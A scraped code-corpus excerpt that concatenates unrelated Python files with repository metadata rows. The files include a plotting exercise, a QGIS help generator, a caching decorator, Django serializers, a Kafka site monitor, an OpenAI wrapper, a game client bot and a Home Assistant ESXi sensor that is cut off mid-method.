if __name__=='__main__':
t_send()
| King-BAT/RanZhi | RanZhiPython/testcase/ranzhi_test.py | ranzhi_test.py | py | 3,045 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "unittest.TestCase",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "commom.WebDriverEngine.WebDriverEngine",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "commom.WebDriverEngine.WebDriverEngine",
"line_number": 16,
"usage_type": "... |
# A program that lists counties and uses a probability function to output their possible frequencies.
# Author: Ryan Cox
import numpy as np
import matplotlib.pyplot as plt
# make the array of occurrences
possibleCounties = ["Kerry", "Dublin", "Galway", "Cork", "Meath"]
# np.random.choice() samples with given probabilities. First come the objects, then p (the probability of each outcome),
# then size (the size of the sample).
# The probabilities in p must sum to one.
counties = np.random.choice(possibleCounties, p=[0.3, 0.4, 0.1, 0.1, 0.1 ] ,size=(100))
# unique holds the county names, counts their frequencies. return_counts=True asks np.unique to also return the counts.
unique, counts = np.unique(counties, return_counts=True)
# counts gives the slice sizes of the pie; unique gives the labels, i.e. the counties
plt.pie(counts, labels= unique)
plt.show() | RYANCOX00/programming2021 | Week08-Plotting/Lab8.11.2.ABSolution.py | Lab8.11.2.ABSolution.py | py | 856 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.random.choice",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "numpy.unique",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.... |
73911033314 | import sys
import os
import json
import glob
sys.path.append(
os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'../python/ext-libs'))
from six import string_types
cpp = open(sys.argv[1], "w")
cpp.write(
"#include \"qgsexpression.h\"\n"
"\n"
"QHash<QString, QgsExpression::Help> QgsExpression::gFunctionHelpTexts;\n"
"\n"
"void QgsExpression::initFunctionHelp()\n"
"{\n"
" if( !gFunctionHelpTexts.isEmpty() )\n"
" return;"
)
def quote(v):
if isinstance(v, dict):
for k in v:
v[k] = quote(v[k])
return v
elif isinstance(v, list):
return map(quote, v)
elif isinstance(v, string_types):
return v.replace('"', '\\"').replace('\n', '\\n')
elif isinstance(v, bool):
return v
else:
raise BaseException("unexpected type " + repr(v))
for f in sorted(glob.glob('resources/function_help/json/*')):
with open(f) as function_file:
try:
json_params = json.load(function_file)
except:
print(f)
raise
json_params = quote(json_params)
for field in ['name', 'type']:
if not field in json_params:
raise BaseException("%s: %s missing" % (f, field))
if not json_params['type'] in ['function', 'operator', 'value', 'expression', 'group']:
raise BaseException("%s: invalid type %s " % (f, json_params['type']))
if not 'variants' in json_params:
# convert single variant shortcut to a expanded variant
v = {}
for i in json_params:
v[i] = json_params[i]
v['variant'] = json_params['name']
v['variant_description'] = json_params['description']
json_params['variants'] = [v]
name = "\"{0}\"".format(json_params['name'])
if json_params['type'] == 'operator':
for v in json_params['variants']:
if not 'arguments' in v:
raise BaseException("%s: arguments expected for operator")
if len(list(v['arguments'])) < 1 or len(list(v['arguments'])) > 2:
raise BaseException("%s: 1 or 2 arguments expected for operator")
cpp.write("\n\n gFunctionHelpTexts.insert( {0},\n Help( {0}, tr( \"{1}\" ), tr( \"{2}\" ),\n QList<HelpVariant>()".format(
name, json_params['type'], json_params['description'])
)
for v in json_params['variants']:
cpp.write(
"\n << HelpVariant( tr( \"{0}\" ), tr( \"{1}\" ),\n QList<HelpArg>()".format(v['variant'], v['variant_description']))
if 'arguments' in v:
for a in v['arguments']:
cpp.write("\n << HelpArg( \"{0}\", tr( \"{1}\" ), {2}, {3}, {4}, \"{5}\" )".format(
a['arg'],
a.get('description', ''),
"true" if a.get('descOnly', False) else "false",
"true" if a.get('syntaxOnly', False) else "false",
"true" if a.get('optional', False) else "false",
a.get('default', ''))
)
cpp.write(",\n /* variableLenArguments */ {0}".format(
"true" if v.get('variableLenArguments', False) else "false"))
cpp.write(",\n QList<HelpExample>()")
if 'examples' in v:
for e in v['examples']:
cpp.write("\n << HelpExample( tr( \"{0}\" ), tr( \"{1}\" ), tr( \"{2}\") )".format(
e['expression'],
e['returns'],
e.get('note', ''))
)
if 'notes' in v:
cpp.write(",\n tr( \"{0}\" )".format(v['notes']))
cpp.write("\n )")
cpp.write("\n )")
cpp.write("\n );")
for f in sorted(glob.glob('resources/function_help/text/*')):
n = os.path.basename(f)
with open(f) as content:
cpp.write("\n\n gFunctionHelpTexts.insert( \"{0}\",\n Help( tr( \"{0}\" ), tr( \"group\" ), tr( \"{1}\" ), QList<HelpVariant>() ) );\n".format(
n, content.read().replace('\\', '\\\\').replace('"', '\\"').replace('\n', '\\n')))
cpp.write("\n}\n")
cpp.close()
| nextgis/nextgisqgis | scripts/process_function_template.py | process_function_template.py | py | 4,209 | python | en | code | 27 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": ... |
74391649314 | # -*- coding: utf-8 -*-
import functools
# Write a function decorator that caches the function's results
def cache(func):
cache_dict = {}
# @functools.wraps(func)
def wrapper(*args, **kwargs):
key = repr(args) + repr(kwargs)  # build a string cache key from all positional and keyword arguments
if key in cache_dict:
return cache_dict[key]
else:
# Use cache_dict to cache the result for the same SQL
cache_dict[key] = func(*args, **kwargs)
return cache_dict[key]
wrapper.csrf_exempt = True
functools.update_wrapper(wrapper, func)
return wrapper
@cache
def execute_query(sql):
print('hit db')
return 'result'
# Check that the function name has not changed, i.e. the signature is preserved
print(execute_query)
# <function execute_query at 0xb709c89c>
print(execute_query('select * from table1'))
# hit db
# result
# A key that is already cached does not hit the db again
print(execute_query('select * from table1'))
# result
print(execute_query('select * from table2'))
# hit db
# result
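# For reference (a sketch, not from the original script): the standard library
# offers the same memoisation via functools.lru_cache, for hashable arguments.
@functools.lru_cache(maxsize=None)
def execute_query_cached(sql):
    print('hit db')
    return 'result'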
| hello-wn/python-basic-scripts | 20180425/use_decorator_cacheValue.py | use_decorator_cacheValue.py | py | 943 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "functools.update_wrapper",
"line_number": 18,
"usage_type": "call"
}
] |
34640319155 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from rest_framework import serializers
from database.models import CollectionItemType
from rest.serializers.object_types import items
from . import types
from rest.serializers.object_types import events
from rest.serializers.object_types import mime_types
class SelectSerializer(serializers.ModelSerializer):
class Meta:
model = CollectionItemType
fields = (
'url',
'id',
)
class ListSerializer(serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField(
view_name='rest-api:collectionitemtype-detail')
event_types = events.SelectSerializer(
many=True,
read_only=True,
source='item_type.event_types')
mime_types = mime_types.SelectSerializer(
many=True,
read_only=True,
source='item_type.mime_types')
class Meta:
model = CollectionItemType
fields = (
'url',
'id',
'item_type',
'event_types',
'mime_types',
'metadata_schema',
)
class DetailSerializer(serializers.HyperlinkedModelSerializer):
item_type = items.SelectSerializer(
many=False,
read_only=True)
collection_type = types.SelectSerializer(
many=False,
read_only=True)
event_types = events.SelectSerializer(
many=True,
read_only=True,
source='item_type.event_types')
mime_types = mime_types.SelectSerializer(
many=True,
read_only=True,
source='item_type.mime_types')
class Meta:
model = CollectionItemType
fields = (
'url',
'id',
'collection_type',
'item_type',
'metadata_schema',
'event_types',
'mime_types',
)
class CreateSerializer(serializers.ModelSerializer):
class Meta:
model = CollectionItemType
fields = (
'item_type',
'metadata_schema',
)
def create(self, validated_data):
collection_type = self.context['collection_type']
validated_data['collection_type'] = collection_type
return super().create(validated_data)
| CONABIO-audio/irekua | irekua/rest/serializers/object_types/data_collections/items.py | items.py | py | 2,281 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "rest_framework.serializers.ModelSerializer",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.serializers",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "database.models.CollectionItemType",
"line_number": 17,
"usage... |
17340264805 | import re
from datetime import datetime
import requests
from src import utils
from src.connectors import KafkaClient, PostgreSQLConnector
class SitesAvailability:
"""
A class that fetches metrics from various sites & produces records to Apache Kafka.
Also, it consumes produced records from Kafka and sinks them to a PostgreSQL database
Usage:
sites_availability = SitesAvailability()
"""
def __init__(self):
"""
Initialize site availability operations.
"""
super().__init__()
self.kafka = KafkaClient()
self.sites = utils.read_file_to_list(utils.constants.SITES_FILE_PATH)
@staticmethod
def get_site_metrics(site):
"""
Fetches site metrics
:param site: Site to check
:return: Metrics dict for both successful and unsuccessful requests
"""
now = datetime.now()
request_time = now.strftime("%Y-%m-%d %H:%M:%S")
print("request_time={}".format(request_time))
try:
b = requests.get(site)
b.raise_for_status()
# Fetch request metrics for a successful request
http_response_time = b.elapsed.total_seconds()
status_code = b.status_code
# Search for title tag in HTML. Leave empty string if title not found.
search_text = re.search("<title>(.*?)</title>", b.text)
grouped_text = ''
if search_text:
grouped_text = search_text.group(1)
return {
"request_time": request_time,
"type": "SUCCESS",
"site_url": site,
"response_time_sec": http_response_time,
"status_code": status_code,
"regex_search": grouped_text
}
except requests.exceptions.RequestException as e:
return {
"request_time": request_time,
"type": "ERROR",
"site_url": site,
"exception_type": type(e).__name__
}
def produce_metrics_to_kafka(self):
"""
Polled fetching of metrics for each site in list.
:return: None
"""
for site in self.sites:
print('-----------------------------------')
print(site)
metrics = self.get_site_metrics(site)
if metrics['type'] == 'SUCCESS':
self.kafka.produce("success_topic", metrics['site_url'], metrics)
else:
self.kafka.produce("error_topic", metrics['site_url'], metrics)
def consume_metrics_sink_postgres(self, topics, group_id, auto_offset_reset, pg_table):
"""
Consume data process that stores received records to PostgreSQL table
:param topics: Kafka topics to subscribe
:param group_id: Kafka consumer group ID
:param auto_offset_reset: Read from start or end of stream. Valid values 'earliest' or 'latest'.
:param pg_table: PostgreSQL target table
:return: None
"""
consumer = self.kafka.create_consumer(group_id, auto_offset_reset)
print("Consuming Kafka Topic. Press Ctrl+C to exit")
consumer.subscribe(topics)
# TODO: handle consumer group rebalancing
con = PostgreSQLConnector("localhost", 5432, "sites", "postgres", "postgres")
try:
for msg in consumer:
print(f"Topic: {msg.topic}, Offset: {msg.offset}, Key: {msg.key}, Value: {msg.value}")
con.insert(pg_table, msg.value)
con.close()
except KeyboardInterrupt:
consumer.commit()
consumer.close()
con.close()
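# Hypothetical end-to-end sketch: the topic names mirror produce_metrics_to_kafka()
# above, while the group id and target table below are illustrative placeholders.
if __name__ == '__main__':
    monitor = SitesAvailability()
    monitor.produce_metrics_to_kafka()  # one polling pass over all sites
    monitor.consume_metrics_sink_postgres(
        topics=['success_topic', 'error_topic'],
        group_id='sites-sink',
        auto_offset_reset='earliest',
        pg_table='site_metrics')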
| cnatsis/sites-availability | src/SitesAvailability.py | SitesAvailability.py | py | 3,705 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "src.connectors.KafkaClient",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "src.utils.read_file_to_list",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "src.utils",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "src.... |
22193624498 | import openai
from src.models import ModelFinder
from src.ai.config import CODE_DEFAULT_MAX_TOKENS, CODE_DEFAULT_TEMPERATURE
class CodePromptResult:
def __init__(self, result: str, used_tokens: int) -> None:
self.result = result
self.used_tokens = used_tokens
def code_prompt(
input: str,
temperature: float = CODE_DEFAULT_TEMPERATURE,
max_tokens: int = CODE_DEFAULT_MAX_TOKENS,
echo_prompt: bool = True
) -> CodePromptResult:
response = openai.Completion.create(
model=ModelFinder.get_best_for_code().as_str,
prompt=input,
temperature=temperature,
max_tokens=max_tokens,
echo=echo_prompt
)
result = CodePromptResult(
result=response.choices[0].text,
used_tokens=response.usage.total_tokens
)
return result
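# Usage sketch (assumes the openai client is configured with a valid API key):
if __name__ == '__main__':
    res = code_prompt('def fibonacci(n):', temperature=0.2, max_tokens=64)
    print(res.result)
    print(f'tokens used: {res.used_tokens}')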
| AgustinMDominguez/Prompt | prompter/src/ai/code.py | code.py | py | 825 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "src.ai.config.CODE_DEFAULT_TEMPERATURE",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "src.ai.config.CODE_DEFAULT_MAX_TOKENS",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "openai.Completion.create",
"line_number": 20,
"usage_type": ... |
37205546104 | # -*- coding: UTF-8 -*-
import pyee
import logging
import asyncio
import coloredlogs
from enum import Enum
from utils import MockTimeout
from models import dict2obj
from client_network import ClientNetwork
# Format colors in loggers
coloredlogs.DEFAULT_FIELD_STYLES['levelname']['color'] = 'yellow'
coloredlogs.install(level="DEBUG", fmt='[ %(asctime)s %(name)s ] %(levelname)s: %(message)s', datefmt='%d/%m/%y %H:%M:%S')
# Enum game stages
class ClientStage(Enum):
DISCONNECTED, CONNECTING, AUTHENTICATING, UNLOCKING_PINCODE, SELECTING_CHARACTER, WORLD = range(6)
class ClientGame(pyee.EventEmitter):
''' Clientless, able to simulate official client packets and connect to the game. '''
def __init__(self, loop, server_address):
''' Constructor '''
# inheritance constructor
pyee.EventEmitter.__init__(self)
# logger configure
self.logger = logging.getLogger(f"{id(self)}")
self.logger.name = self
# internal members
self._loop = loop
self._stage = ClientStage.DISCONNECTED
self.network = None
# default informations
self._values = {
"server address": server_address,
"message": None,
"username": None,
"password": None,
"objects": { }
}
# register handles of events
self.on("connected", self.handle_connected)
self.on("disconnected", self.handle_disconnected)
self.on("recv_packet", self.handle_recv_packet)
def __str__(self):
''' Return a string representation of the class instance. '''
return f"{self.__class__.__name__}<Index: {id(self):X}, Stage: {self._stage.name}, User: {self._values['username']}>"
@property
def last_message(self):
''' Returns the last message received by the server '''
return self._values['message']
@property
def objects(self):
''' Returns list of all objects in the field of view '''
if self._stage == ClientStage.WORLD:
return self._values['objects']
def get_object(self, index = None):
''' Returns the object with the specified index '''
object_index = index if index else self.network.session_index
if object_index in self._values['objects']:
return self._values['objects'][object_index]
def get_stage(self):
''' Get current instance stage '''
return self._stage
def set_stage(self, stage):
''' Update instance stage '''
self._stage = stage
self.emit("update_stage", stage)
async def authenticate(self, username, password, timeout = 3.0):
''' Connect and authenticate to the server '''
# check socket stage
if self._stage == ClientStage.DISCONNECTED:
# create instance of mock timeout
mock = MockTimeout(return_value = None)
try:
# event: establishing connection
self.set_stage(ClientStage.CONNECTING)
# setup extra members
self._values['message'] = None
self._values['objects'] = { }
# setup information to authentication
self._values['username'] = username
self._values['password'] = password
# start connection
transport, self.network = await self._loop.create_connection(lambda: ClientNetwork(self), *self._values['server address'])
# register event
@self.on("update_stage")
def handle_update_stage(stage):
if stage == ClientStage.DISCONNECTED:
mock.return_value = False
mock()
elif stage == ClientStage.UNLOCKING_PINCODE:
mock.return_value = True
mock()
# send authenticate packet
self.network.write_packet('Authenticate', {
# account information
"password": self._values['password'],
"username": self._values['username'],
# information required by the fernando server
"mac_address": "\x31\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32",
})
# mock event wait
if not await mock.wait(timeout = timeout):
# force disconnect
self.network.close()
# remove event
self.remove_listener('update_stage', handle_update_stage)
except (ConnectionRefusedError, TimeoutError) as error:
self._values['message'] = "Connection Error"
self.logger.error(f"Could not establish connection to the server: {self._values['server address']}")
self.set_stage(ClientStage.DISCONNECTED)
# return operation result
return mock.return_value
# the instance is busy, it needs to be disconnected to start a new connection.
else:
return False
async def pincode(self, code, timeout = 3.0):
''' Confirm pincode on server '''
# check socket stage
if self._stage == ClientStage.UNLOCKING_PINCODE:
# create instance of mock timeout
mock = MockTimeout(return_value = None)
# register event
@self.on("update_stage")
def handle_update_stage(stage):
if stage == ClientStage.DISCONNECTED:
mock.return_value = False
mock()
elif stage == ClientStage.UNLOCKING_PINCODE:
mock.return_value = False
mock()
elif stage == ClientStage.SELECTING_CHARACTER:
mock.return_value = True
mock()
# send pincode request
self.network.write_packet("Pincode", { "code": code })
# mock event wait
if not await mock.wait(timeout = timeout):
# force disconnect
self.network.close()
# remove event
self.remove_listener('update_stage', handle_update_stage)
# return operation result
return mock.return_value
else:
return False
async def select_char(self, index, timeout = 3.0):
''' Select character '''
# check socket stage
if self._stage == ClientStage.SELECTING_CHARACTER:
# create instance of mock timeout
mock = MockTimeout(return_value = None)
# register event
@self.on("update_stage")
def handle_update_stage(stage):
if stage == ClientStage.DISCONNECTED:
mock.return_value = False
mock()
elif stage == ClientStage.WORLD:
mock.return_value = True
mock()
# send select char request
self.network.write_packet("SelectChar", { "index": index })
# mock event wait
if not await mock.wait(timeout = timeout):
# force disconnect
self.network.close()
# remove event
self.remove_listener('update_stage', handle_update_stage)
# return operation result
return mock.return_value
else:
return False
def logout(self):
''' Disconnect from server '''
if self._stage.value >= ClientStage.AUTHENTICATING.value:
self.network.close()
def handle_connected(self, network):
''' Handle called when socket is connected '''
self.logger.debug("handle_connected")
self.set_stage(ClientStage.AUTHENTICATING)
def handle_disconnected(self, network):
''' Handle called when socket is disconnected '''
self.logger.debug("handle_disconnected")
self.set_stage(ClientStage.DISCONNECTED)
def handle_recv_packet(self, network, packet_opcode, packet_name, packet_data):
''' Handle called when socket received packet '''
self.logger.debug("recv_packet: { Size: %d, Session: %d, Name: '%s' }" % (packet_data.header.size, packet_data.header.session, packet_name))
# Update useful information to generate packet keys, packet timestamp and update stages.
if packet_name == "Authenticate":
self.network.set_session_timer(packet_data.header.timestamp)
self.network.set_session_keys(packet_data.key_hash)
self.set_stage(ClientStage.UNLOCKING_PINCODE)
# Update stage to warn that it failed; this could be removed with adaptations to the pincode function.
elif packet_name == "PincodeRefused":
self.set_stage(ClientStage.UNLOCKING_PINCODE)
# Update stage
elif packet_name == "PincodeAccepted":
self.set_stage(ClientStage.SELECTING_CHARACTER)
# Update your own character's session index and information to generate packet timestamp.
elif packet_name == "EnterWorld":
self.network.set_session_timer(packet_data.header.timestamp)
self.network.set_session_index(packet_data.session_index)
self.set_stage(ClientStage.WORLD)
# Include object in list
elif packet_name == "CreateMob":
self._values['objects'][packet_data.index] = dict2obj({
'name': packet_data.name,
'speed': packet_data.score.move.speed,
'position': {
'x': packet_data.position.x,
'y': packet_data.position.y
}
})
# Delete object that left the field of view.
elif packet_name == "DeleteMob":
self._values['objects'].pop(packet_data.header.session)
# Update object position.
elif packet_name == "Movement":
self._values['objects'][packet_data.header.session].position.x = packet_data.destiny.x
self._values['objects'][packet_data.header.session].position.y = packet_data.destiny.y
# Update last message received from the server.
elif packet_name == "ServerMessage":
self._values['message'] = packet_data.text
# TODO: this should not be updated on every packet; it is a temporary workaround.
self.network.set_session_timer(packet_data.header.timestamp)
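# Hedged usage sketch; the server address, credentials and pincode are placeholders.
if __name__ == '__main__':
    async def demo(loop):
        game = ClientGame(loop, ('127.0.0.1', 8281))
        if await game.authenticate('user', 'password'):
            if await game.pincode('0000'):
                await game.select_char(0)
                print(game.objects)
        game.logout()

    loop = asyncio.get_event_loop()
    loop.run_until_complete(demo(loop))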
| xBrunoMedeiros/wyd-bot | client_game.py | client_game.py | py | 8,848 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "coloredlogs.DEFAULT_FIELD_STYLES",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "coloredlogs.install",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "enum.Enum",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "p... |
25588514888 | # import atexit
import time
import json
from datetime import timedelta
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION,CONF_TYPE)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.event import track_time_interval
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
TIME_BETWEEN_UPDATES = timedelta(seconds=60)
CONF_USERNAME = "username"
CONF_PASSWORD = "password"
CONF_VCHOST = "vchost"
CONF_PORT = "port"
CONF_DATASTORE = "datastore"
CONF_ESXI = "esxi"
CONF_VM = "vm"
CONF_METRIC = "metric"
DATASTORE_DEFAULT="capacity"
CONF_ATTRIBUTION="Powered by Syjjx"
REQUIREMENTS = ['pyvmomi==6.7']
from pyVmomi import vim, vmodl
from pyVim.connect import SmartConnectNoSSL#, Disconnect
DATASTORE = {
"freePercent": ["datastore_freePercent", "存储剩余容量百分比", "mdi:harddisk", "%"]
}
ESXI = {
"if_in": ["esxi_net_if_in", "下载速度", "mdi:server-network", "mbps"],
"if_out": ["esxi_net_if_out", "上传速度", "mdi:server-network", "mbps"],
"memory": ["esxi_memory_freePercent", "内存使用率", "mdi:memory", "%"],
"cpu": ["esxi_cpu_usage", "CPU使用率", "mdi:memory", "%"],
"uptime": ["esxi_uptime", "开机时间", "mdi:clock", ""],
}
VM = {
"if_in": ["vm_net_if_in", "下载速度", "mdi:server-network", "mbps"],
"if_out": ["vm_net_if_out", "上传速度", "mdi:server-network", "mbps"],
"io_write": ["vm_datastore_io_write_bytes", "写流量", "mdi:harddisk", "MB/s"],
"io_read": ["vm_datastore_io_read_bytes", "读流量", "mdi:harddisk", "MB/s"],
"memory": ["vm_memory_freePercent", "内存使用率", "mdi:memory", "%"],
"cpu": ["vm_cpu_usage", "CPU使用率", "mdi:memory", "%"],
"uptime": ["vm_uptime", "开机时间", "mdi:clock", ""]
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Required(CONF_VCHOST): cv.string,
vol.Optional(CONF_PORT,default=443): cv.string,
vol.Optional(CONF_DATASTORE):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_TYPE): cv.string,
vol.Optional(CONF_METRIC): cv.ensure_list,
})]),
vol.Optional(CONF_ESXI):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_TYPE): cv.string,
vol.Optional(CONF_METRIC): cv.ensure_list,
})]),
vol.Optional(CONF_VM):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_TYPE): cv.string,
vol.Optional(CONF_METRIC): cv.ensure_list,
})]),
})
def setup_platform(hass, config, add_devices, discovery_info=None):
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
vchost = config.get(CONF_VCHOST)
port = config.get(CONF_PORT)
dev = []
datastore_names = []
esxi_names = []
vm_names = []
client = Hello_Esxi(vchost,username,password,port=port)
if client.vcenter_status[0] == True:
json_vcenter_status=json.loads(client.vcenter_status[1])
_LOGGER.debug(client.vcenter_status[1])  # log the discovered inventory
for datastore in config[CONF_DATASTORE]:
if datastore[CONF_TYPE] in json_vcenter_status['datastore']:
datastore_names.append(datastore[CONF_TYPE])
client.set_datastore_names(datastore_names)
if datastore.get(CONF_METRIC) !=None:
for key in datastore[CONF_METRIC]:
dev.append(EsxiSensor([datastore[CONF_TYPE],datastore[CONF_TYPE]+'_'+DATASTORE[key][0],'datastore'],DATASTORE[key],client))
else:
for key in DATASTORE:
dev.append(EsxiSensor([datastore[CONF_TYPE],datastore[CONF_TYPE]+'_'+DATASTORE[key][0],'datastore'],DATASTORE[key],client))
else:
_LOGGER.error("You don't have DATASTORE named {} !".format(datastore[CONF_TYPE]))
for esxi in config[CONF_ESXI]:
if esxi[CONF_TYPE] in json_vcenter_status['esxi']:
esxi_names.append(esxi[CONF_TYPE])
client.set_esxi_names(esxi_names)
if esxi.get(CONF_METRIC) !=None:
for key in esxi[CONF_METRIC]:
dev.append(EsxiSensor([esxi[CONF_TYPE],esxi[CONF_TYPE]+'_'+ESXI[key][0],'esxi'],ESXI[key],client))
else:
for key in ESXI:
dev.append(EsxiSensor([esxi[CONF_TYPE],esxi[CONF_TYPE]+'_'+ESXI[key][0],'esxi'],ESXI[key],client))
else:
_LOGGER.error("You don't have ESXI named {} !".format(esxi[CONF_TYPE]))
for vm in config[CONF_VM]:
if vm[CONF_TYPE] in json_vcenter_status['vm']:
vm_names.append(vm[CONF_TYPE])
client.set_vm_names(vm_names)
if vm.get(CONF_METRIC) !=None:
for key in vm[CONF_METRIC]:
# _LOGGER.error(vm[CONF_TYPE]+'_'+VM[key][0])
dev.append(EsxiSensor([vm[CONF_TYPE],vm[CONF_TYPE]+'_'+VM[key][0],'vm'],VM[key],client))
else:
for key in VM:
# _LOGGER.error(vm[CONF_TYPE]+'_'+VM[key][0])
dev.append(EsxiSensor([vm[CONF_TYPE],vm[CONF_TYPE]+'_'+VM[key][0],'vm'],VM[key],client))
else:
_LOGGER.error("You don't have VM named {} !".format(vm[CONF_TYPE]))
client.start(hass)
add_devices(dev, True)
else:
_LOGGER.error(client.vcenter_status[1])
class EsxiSensor(Entity):
def __init__(self,name,option,data):
"""Initialize."""
self._interval=60
self._data = data
self._object_id = name
self._friendly_name = 'null'
self._icon = option[2]
self._unit_of_measurement = option[3]
self.attributes={ATTR_ATTRIBUTION: CONF_ATTRIBUTION}
self._type = option
self._state = None
self._updatetime = None
@property
def name(self):
"""Return the entity's name."""
return self._object_id[1]
@property
def registry_name(self):
"""Return the entity's friendly_name attribute."""
return self._friendly_name
@property
def state(self):
"""Return the current state."""
return self._state
@property
def icon(self):
"""Return the icon attribute."""
return self._icon
@property
def unit_of_measurement(self):
"""Return the unit_of_measurement attribute."""
return self._unit_of_measurement
@property
def device_state_attributes(self):
"""Set some additional attribute values."""
if self._state is not None:
return self.attributes
def update(self):
if self._object_id[2] == 'datastore':
self._friendly_name = self._object_id[0]
self._state = round((100-json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]]),2)
self.attributes['容量']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["datastore_capacity"]/1073741824),2))+'GB'
self.attributes['已用']=str(round(((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["datastore_capacity"]
-json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["datastore_free"])/1073741824),2))+'GB'
elif self._object_id[2] == 'esxi':
self._friendly_name = self._object_id[1]
if self._type[0] == 'esxi_memory_freePercent':
self._state = round((100-json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]]),2)
self.attributes['内存容量']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["esxi_memory_capacity"]/1073741824),2))+'GB'
self.attributes['已用内存']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["esxi_memory_usage"]/1073741824),2))+'GB'
elif self._type[0] == 'esxi_net_if_in' or self._type[0] == 'esxi_net_if_out':
self._state = round(((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])/1024/1024),2)
elif self._type[0] == 'esxi_cpu_usage':
self._state = round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]]),2)
else:
# _LOGGER.error(json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])
self._state = timedelta(seconds=json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])
elif self._object_id[2] == 'vm':
self._friendly_name = self._object_id[1]
if json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["powerState"] != "poweredOn":
self._state = 0
elif self._type[0] == 'vm_memory_freePercent':
self._state = round((100-json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]]),2)
self.attributes['内存容量']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["vm_memory_capacity"]/1073741824),2))+'GB'
self.attributes['已用内存']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["vm_memory_usage"]/1073741824),2))+'GB'
elif self._type[0] == 'vm_net_if_in' or self._type[0] == 'vm_net_if_out':
self._state = round(((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])/1024/1024),2)
elif self._type[0] == 'vm_cpu_usage':
self._state = round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]]),2)
elif self._type[0] == 'vm_datastore_io_write_bytes':
self._state = round(((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])/1024/1024),2)
self.attributes['写延迟']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["vm_datastore_io_write_latency"]),2))+'ms'
self.attributes['写IOPS']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["vm_datastore_io_write_numbers"]),2))
elif self._type[0] == 'vm_datastore_io_read_bytes':
self._state = round(((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])/1024/1024),2)
self.attributes['读延迟']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["vm_datastore_io_read_latency"]),2))+'ms'
self.attributes['读IOPS']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["vm_datastore_io_read_numbers"]),2))
else:
self._state = timedelta(seconds=json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])
class Hello_Esxi():
def __init__(self,vchost,username,password,port=443):
self._vcenter_status={"datastore":[],"esxi":[],"vm":[]}
self._vchost=vchost
self._username=username
self._password=password
self._port=port
self._payload=[]
self._interval=60
self._data={"datastore":{},"esxi":{},"vm":{}}
self.success,self.msg=self.hello_vcenter()
def start(self,hass):
if self.success == True:
self.run(dt_util.now())
# Call run() once every TIME_BETWEEN_UPDATES
track_time_interval(hass, self.run, TIME_BETWEEN_UPDATES)
else:
